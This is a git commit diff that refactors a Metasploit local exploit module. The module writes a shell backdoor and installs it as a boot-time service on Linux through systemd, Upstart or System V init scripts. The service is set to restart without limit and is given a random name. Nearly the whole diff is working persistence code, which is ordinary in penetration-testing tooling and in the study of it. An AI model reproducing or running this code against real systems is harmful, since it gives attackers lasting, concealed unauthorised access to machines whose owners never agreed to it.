updates round 2
This commit is contained in:
parent
1c20122648
commit
03dca5fee2
|
@ -3,9 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/file'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
|
@ -47,8 +44,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'Targets' =>
|
||||
[
|
||||
['Auto', {}],
|
||||
['System V', { 'runlevel' => '2 3 4 5' }],
|
||||
['Upstart', { 'runlevel' => '2345' }],
|
||||
['System V', { :runlevel => '2 3 4 5' }],
|
||||
['Upstart', { :runlevel => '2345' }],
|
||||
['systemd', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
|
@ -84,13 +81,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def exploit
|
||||
backdoor = write_shell(datastore['SHELLPATH'])
|
||||
path = backdoor.split(File::SEPARATOR)[0...-1].join('/')
|
||||
file = backdoor.split(File::SEPARATOR)[-1]
|
||||
path = backdoor.split('/')[0...-1].join('/')
|
||||
file = backdoor.split('/')[-1]
|
||||
case target.name
|
||||
when 'System V'
|
||||
system_v(path, file, target.opts['runlevel'], service_system_exists?('update-rc.d'))
|
||||
system_v(path, file, target.opts[:runlevel], service_system_exists?('update-rc.d'))
|
||||
when 'Upstart'
|
||||
upstart(path, file, target.opts['runlevel'])
|
||||
upstart(path, file, target.opts[:runlevel])
|
||||
when 'systemd'
|
||||
systemd(path, file)
|
||||
else
|
||||
|
@ -129,17 +126,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def systemd(backdoor_path, backdoor_file)
|
||||
# https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
|
||||
script = "[Unit]\n"
|
||||
script << "Description=Start daemon at boot time\n"
|
||||
script << "After=\n"
|
||||
script << "Requires=\n"
|
||||
script << "[Service]\n"
|
||||
script << "RestartSec=10s\n"
|
||||
script << "Restart=always\n"
|
||||
script << "TimeoutStartSec=5\n"
|
||||
script << "ExecStart=/bin/sh #{backdoor_path}#{File::SEPARATOR}#{backdoor_file}\n"
|
||||
script << "[Install]\n"
|
||||
script << "WantedBy=multi-user.target\n"
|
||||
script = %{[Unit]
|
||||
Description=Start daemon at boot time
|
||||
After=
|
||||
Requires=
|
||||
[Service]
|
||||
RestartSec=10s
|
||||
Restart=always
|
||||
TimeoutStartSec=5
|
||||
ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
|
||||
[Install]
|
||||
WantedBy=multi-user.target}
|
||||
|
||||
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
|
||||
vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
|
||||
|
@ -152,17 +149,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def upstart(backdoor_path, backdoor_file, runlevel)
|
||||
# http://blog.terminal.com/getting-started-with-upstart/
|
||||
script = "description \"Start daemon at boot time\"\n"
|
||||
script << "start on filesystem or runlevel [#{runlevel}]\n"
|
||||
script << "stop on shutdown\n"
|
||||
script << "script\n"
|
||||
script << " cd #{backdoor_path}\n"
|
||||
script << " echo $$ > /var/run/#{backdoor_file}.pid\n"
|
||||
script << " exec #{backdoor_file}\n"
|
||||
script << "end script\n"
|
||||
script << "post-stop exec sleep 10\n"
|
||||
script << "respawn\n"
|
||||
script << "respawn limit unlimited\n"
|
||||
script = %{description \"Start daemon at boot time\"
|
||||
start on filesystem or runlevel [#{runlevel}]
|
||||
stop on shutdown
|
||||
script
|
||||
cd #{backdoor_path}
|
||||
echo $$ > /var/run/#{backdoor_file}.pid
|
||||
exec #{backdoor_file}
|
||||
end script
|
||||
post-stop exec sleep 10
|
||||
respawn
|
||||
respawn limit unlimited}
|
||||
|
||||
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
|
||||
vprint_status("Writing service: /etc/init/#{service_filename}.conf")
|
||||
|
@ -178,95 +175,96 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
else
|
||||
print_status('Utilizing chkconfig')
|
||||
end
|
||||
script = "#!/bin/sh\n"
|
||||
script << "### BEGIN INIT INFO\n"
|
||||
script << "# Provides: service\n"
|
||||
script << "# Required-Start: $network\n"
|
||||
script << "# Required-Stop: $network\n"
|
||||
script << "# Default-Start: #{runlevel}\n"
|
||||
script << "# Default-Stop: 0 1 6\n"
|
||||
script << "# Short-Description: Start daemon at boot time\n"
|
||||
script << "# Description: Enable service provided by daemon.\n"
|
||||
script << "### END INIT INFO\n"
|
||||
script << "dir=\"#{backdoor_path}\"\n"
|
||||
script << "cmd=\"#{backdoor_file}\"\n"
|
||||
script << "name=`basename $0`\n"
|
||||
script << "pid_file=\"/var/run/$name.pid\"\n"
|
||||
script << "stdout_log=\"/var/log/$name.log\"\n"
|
||||
script << "stderr_log=\"/var/log/$name.err\"\n"
|
||||
script << "get_pid() {\n"
|
||||
script << " cat \"$pid_file\"\n"
|
||||
script << "}\n"
|
||||
script << "is_running() {\n"
|
||||
script << " [ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1\n"
|
||||
script << "}\n"
|
||||
script << "case \"$1\" in\n"
|
||||
script << " start)\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Already started\"\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Starting $name\"\n"
|
||||
script << " cd \"$dir\"\n"
|
||||
script = %{#!/bin/sh
|
||||
### BEGIN INIT INFO
|
||||
# Provides: service
|
||||
# Required-Start: $network
|
||||
# Required-Stop: $network
|
||||
# Default-Start: #{runlevel}
|
||||
# Default-Stop: 0 1 6
|
||||
# Short-Description: Start daemon at boot time
|
||||
# Description: Enable service provided by daemon.
|
||||
### END INIT INFO
|
||||
dir=\"#{backdoor_path}\"
|
||||
cmd=\"#{backdoor_file}\"
|
||||
name=`basename $0`
|
||||
pid_file=\"/var/run/$name.pid\"
|
||||
stdout_log=\"/var/log/$name.log\"
|
||||
stderr_log=\"/var/log/$name.err\"
|
||||
get_pid() {
|
||||
cat \"$pid_file\"
|
||||
}
|
||||
is_running() {
|
||||
[ -f \"$pid_file\" ] && ps `get_pid` > /dev/null 2>&1
|
||||
}
|
||||
case \"$1\" in
|
||||
start)
|
||||
if is_running; then
|
||||
echo \"Already started\"
|
||||
else
|
||||
echo \"Starting $name\"
|
||||
cd \"$dir\"}
|
||||
|
||||
if has_updatercd
|
||||
script << " sudo $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
|
||||
else # CentOS didn't like sudo or su...
|
||||
script << " $cmd >> \"$stdout_log\" 2>> \"$stderr_log\" &\n"
|
||||
end
|
||||
script << " echo $! > \"$pid_file\"\n"
|
||||
script << " if ! is_running; then\n"
|
||||
script << " echo \"Unable to start, see $stdout_log and $stderr_log\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " fi\n"
|
||||
script << " fi\n"
|
||||
script << " ;;\n"
|
||||
script << " stop)\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo -n \"Stopping $name..\"\n"
|
||||
script << " kill `get_pid`\n"
|
||||
script << " for i in {1..10}\n"
|
||||
script << " do\n"
|
||||
script << " if ! is_running; then\n"
|
||||
script << " break\n"
|
||||
script << " fi\n"
|
||||
script << " echo -n \".\"\n"
|
||||
script << " sleep 1\n"
|
||||
script << " done\n"
|
||||
script << " echo\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Not stopped; may still be shutting down or shutdown may have failed\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Stopped\"\n"
|
||||
script << " if [ -f \"$pid_file\" ]; then\n"
|
||||
script << " rm \"$pid_file\"\n"
|
||||
script << " fi\n"
|
||||
script << " fi\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Not running\"\n"
|
||||
script << " fi\n"
|
||||
script << " ;;\n"
|
||||
script << " restart)\n"
|
||||
script << " $0 stop\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Unable to stop, will not attempt to start\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " fi\n"
|
||||
script << " $0 start\n"
|
||||
script << " ;;\n"
|
||||
script << " status)\n"
|
||||
script << " if is_running; then\n"
|
||||
script << " echo \"Running\"\n"
|
||||
script << " else\n"
|
||||
script << " echo \"Stopped\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " fi\n"
|
||||
script << " ;;\n"
|
||||
script << " *)\n"
|
||||
script << " echo \"Usage: $0 {start|stop|restart|status}\"\n"
|
||||
script << " exit 1\n"
|
||||
script << " ;;\n"
|
||||
script << "esac\n"
|
||||
script << "exit 0\n"
|
||||
script << %{ echo $! > \"$pid_file\"
|
||||
if ! is_running; then
|
||||
echo \"Unable to start, see $stdout_log and $stderr_log\"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
;;
|
||||
stop)
|
||||
if is_running; then
|
||||
echo -n \"Stopping $name..\"
|
||||
kill `get_pid`
|
||||
for i in {1..10}
|
||||
do
|
||||
if ! is_running; then
|
||||
break
|
||||
fi
|
||||
echo -n \".\"
|
||||
sleep 1
|
||||
done
|
||||
echo
|
||||
if is_running; then
|
||||
echo \"Not stopped; may still be shutting down or shutdown may have failed\"
|
||||
exit 1
|
||||
else
|
||||
echo \"Stopped\"
|
||||
if [ -f \"$pid_file\" ]; then
|
||||
rm \"$pid_file\"
|
||||
fi
|
||||
fi
|
||||
else
|
||||
echo \"Not running\"
|
||||
fi
|
||||
;;
|
||||
restart)
|
||||
$0 stop
|
||||
if is_running; then
|
||||
echo \"Unable to stop, will not attempt to start\"
|
||||
exit 1
|
||||
fi
|
||||
$0 start
|
||||
;;
|
||||
status)
|
||||
if is_running; then
|
||||
echo \"Running\"
|
||||
else
|
||||
echo \"Stopped\"
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo \"Usage: $0 {start|stop|restart|status}\"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
exit 0}
|
||||
|
||||
service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
|
||||
vprint_status("Writing service: /etc/init.d/#{service_filename}")
|
||||
|
|
Loading…
Reference in New Issue